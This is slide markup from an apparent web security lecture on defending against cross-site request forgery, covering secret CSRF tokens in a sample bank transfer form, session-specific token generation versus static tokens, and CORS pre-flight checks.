              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="4100"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="4700"/>
            </a:pPr>
            <a:r>
              <a:t>https://attacker.com      →          https://bank.com           </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" sz="5600">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumOff val="-29866"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>X</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="5600">
              <a:solidFill>
                <a:schemeClr val="accent5">
                  <a:lumOff val="-29866"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="4100"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="4700"/>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://attacker.com    </a:t>
            </a:r>
            <a:r>
              <a:t>  →          https://bank.com          </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" sz="5600">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:hueOff val="-1081314"/>
                    <a:satOff val="4338"/>
                    <a:lumOff val="-8931"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>??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ecret Token Validation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>
              <a:defRPr sz="1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/>
            <a:r>
              <a:t>Secret Token Validation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="203" name="bank.com includes a secret value in every form that the server can validate"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1689100" y="3513508"/>
            <a:ext cx="21005800" cy="1327719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rPr>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>bank.com</a:t>
            </a:r>
            <a:r>
              <a:t> includes a secret value in every form that the server can validate</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="204" name="&lt;form action=“https://bank.com/transfer&quot; method=&quot;post&quot;&gt;…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1689100" y="5311717"/>
            <a:ext cx="21005800" cy="43625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 algn="l" defTabSz="12700">
              <a:lnSpc>
                <a:spcPct val="11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400">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="008700"/>
                </a:solidFill>
              </a:rPr>
              <a:t>form</a:t>
            </a:r>
            <a:r>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="0329D6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>action</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="424242"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:t>“https://bank.com/transfer" </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="0329D6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>method</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="424242"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:t>"post"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="12700">
              <a:lnSpc>
                <a:spcPct val="11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400">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>  &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="008700"/>
                </a:solidFill>
              </a:rPr>
              <a:t>input</a:t>
            </a:r>
            <a:r>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="0329D6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>type</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="424242"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:hueOff val="914337"/>
                    <a:satOff val="31515"/>
                    <a:lumOff val="-30790"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>"hidden"</a:t>
            </a:r>
            <a:r>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="0329D6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="424242"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:t>"csrf_token" </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="0329D6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>value</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="424242"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:t>“434ec7e838ec3167ef5"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="12700">
              <a:lnSpc>
                <a:spcPct val="11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1500">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="12700">
              <a:lnSpc>
                <a:spcPct val="11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400">
                <a:solidFill>
                  <a:srgbClr val="008700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rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"/>
              <a:t>input</a:t>
            </a:r>
            <a:r>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="0329D6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>type</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="424242"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:t>“text" </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="0329D6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="424242"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:t>"to"</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="12700">
              <a:lnSpc>
                <a:spcPct val="11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400">
                <a:solidFill>
                  <a:srgbClr val="008700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rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"/>
              <a:t>input</a:t>
            </a:r>
            <a:r>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="0329D6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>type</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="424242"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:t>“text" </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="0329D6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="424242"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:t>“amount”</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="12700">
              <a:lnSpc>
                <a:spcPct val="11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1500">
                <a:solidFill>
                  <a:srgbClr val="008700"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="12700">
              <a:lnSpc>
                <a:spcPct val="11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400">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>  &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="008700"/>
                </a:solidFill>
              </a:rPr>
              <a:t>button</a:t>
            </a:r>
            <a:r>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="0329D6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>type</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="424242"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:hueOff val="914337"/>
                    <a:satOff val="31515"/>
                    <a:lumOff val="-30790"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>"submit"</a:t>
            </a:r>
            <a:r>
              <a:t>&gt;Transfer!&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="008700"/>
                </a:solidFill>
              </a:rPr>
              <a:t>button</a:t>
            </a:r>
            <a:r>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="12700">
              <a:lnSpc>
                <a:spcPct val="11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400">
                <a:solidFill>
                  <a:srgbClr val="008700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rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"/>
              <a:t>form</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="205" name="Attacker can’t submit data to /transfer if they don’t know csrf_token"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1641623" y="10652773"/>
            <a:ext cx="21100754" cy="1913624"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent3">
              <a:hueOff val="914337"/>
              <a:satOff val="31515"/>
              <a:lumOff val="-30790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 algn="l">
              <a:defRPr b="0" sz="4700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF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pPr>
            <a:r>
              <a:t>Attacker can’t submit data to /transfer if they don’t know </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>csrf_token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Secret Token Generation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>
              <a:defRPr sz="1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/>
            <a:r>
              <a:t>Secret Token Generation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="208" name="How do we come up with a token that user can access but attacker can’t?"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1689100" y="7162800"/>
            <a:ext cx="21005800" cy="1010742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SzTx/>
              <a:buNone/>
              <a:defRPr sz="4700"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>How do we come up with a token that user can access but attacker can’t?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="209" name="&lt;form action=“https://bank.com/transfer&quot; method=&quot;post&quot;&gt;…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1719374" y="3445509"/>
            <a:ext cx="18252853" cy="29133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12700">
              <a:lnSpc>
                <a:spcPct val="11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400">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="008700"/>
                </a:solidFill>
              </a:rPr>
              <a:t>form</a:t>
            </a:r>
            <a:r>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="0329D6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>action</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="424242"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:t>“https://bank.com/transfer" </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="0329D6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>method</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="424242"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:t>"post"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="12700">
              <a:lnSpc>
                <a:spcPct val="11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400">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>  &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="008700"/>
                </a:solidFill>
              </a:rPr>
              <a:t>input</a:t>
            </a:r>
            <a:r>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="0329D6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>type</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="424242"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:hueOff val="914337"/>
                    <a:satOff val="31515"/>
                    <a:lumOff val="-30790"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>"hidden"</a:t>
            </a:r>
            <a:r>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="0329D6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="424242"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:t>"csrf_token" </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="0329D6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>value</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="424242"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:t>“434ec7e838ec3167ef5"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="12700">
              <a:lnSpc>
                <a:spcPct val="11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400">
                <a:solidFill>
                  <a:srgbClr val="008700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rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"/>
              <a:t>input</a:t>
            </a:r>
            <a:r>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="0329D6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>type</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="424242"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:t>“text" </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="0329D6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="424242"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:t>"to"</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="12700">
              <a:lnSpc>
                <a:spcPct val="11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400">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>  &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="008700"/>
                </a:solidFill>
              </a:rPr>
              <a:t>button</a:t>
            </a:r>
            <a:r>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="0329D6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>type</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="424242"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:hueOff val="914337"/>
                    <a:satOff val="31515"/>
                    <a:lumOff val="-30790"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>"submit"</a:t>
            </a:r>
            <a:r>
              <a:t>&gt;Transfer!&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="008700"/>
                </a:solidFill>
              </a:rPr>
              <a:t>button</a:t>
            </a:r>
            <a:r>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="12700">
              <a:lnSpc>
                <a:spcPct val="11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b="0" sz="3400">
                <a:solidFill>
                  <a:srgbClr val="008700"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"/>
              <a:t>form</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="210" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12496800" y="4038600"/>
            <a:ext cx="7662962" cy="687686"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="50800">
            <a:solidFill>
              <a:schemeClr val="accent5">
                <a:lumOff val="-29866"/>
              </a:schemeClr>
            </a:solidFill>
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr b="0" sz="3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11" name="?"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20297775" y="3859177"/>
            <a:ext cx="476250" cy="970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5700">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumOff val="-29866"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue Black Condensed"/>
                <a:ea typeface="Helvetica Neue Black Condensed"/>
                <a:cs typeface="Helvetica Neue Black Condensed"/>
                <a:sym typeface="Helvetica Neue Black Condensed"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="212" name="❌  Set static token in form…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2451752" y="8417192"/>
            <a:ext cx="20131021" cy="37866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spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:defRPr b="0" sz="4800">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:hueOff val="362282"/>
                    <a:satOff val="31803"/>
                    <a:lumOff val="-18242"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr sz="4000"/>
              <a:t>❌</a:t>
            </a:r>
            <a:r>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Set static token in form </a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:defRPr b="0" sz="4800">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:hueOff val="362282"/>
                    <a:satOff val="31803"/>
                    <a:lumOff val="-18242"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>     → attacker can load the transfer page out of band</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:defRPr b="0" sz="4800">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:hueOff val="362282"/>
                    <a:satOff val="31803"/>
                    <a:lumOff val="-18242"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr sz="6000"/>
              <a:t>✓</a:t>
            </a:r>
            <a:r>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Send session-specific token as part of the page</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:defRPr b="0" sz="4800">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:hueOff val="362282"/>
                    <a:satOff val="31803"/>
                    <a:lumOff val="-18242"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>     → attacker cannot access because SOP blocks reading content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Force CORS Pre-Fligh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l">
              <a:defRPr sz="1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/>
            <a:r>
              <a:t>Force CORS Pre-Flight</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="215" name="Requests that required and passed CORS Pre-Flight check are safe…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1689100" y="3513508"/>
            <a:ext cx="21780897" cy="7654454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2800"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="4500"/>
            </a:pPr>
            <a:r>
              <a:t>Requests that required and passed CORS Pre-Flight check are safe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="4500">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:hueOff val="362282"/>
                    <a:satOff val="31803"/>
                    <a:lumOff val="-18242"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>→ Typical </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>GET</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>s and </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>POST</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>s don’t require Pre-Flight even if </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>XMLHTTPRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="3500">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:hueOff val="362282"/>
                    <a:satOff val="31803"/>
                    <a:lumOff val="-18242"/>
                  </a:schemeClr>
                </a:solidFill>
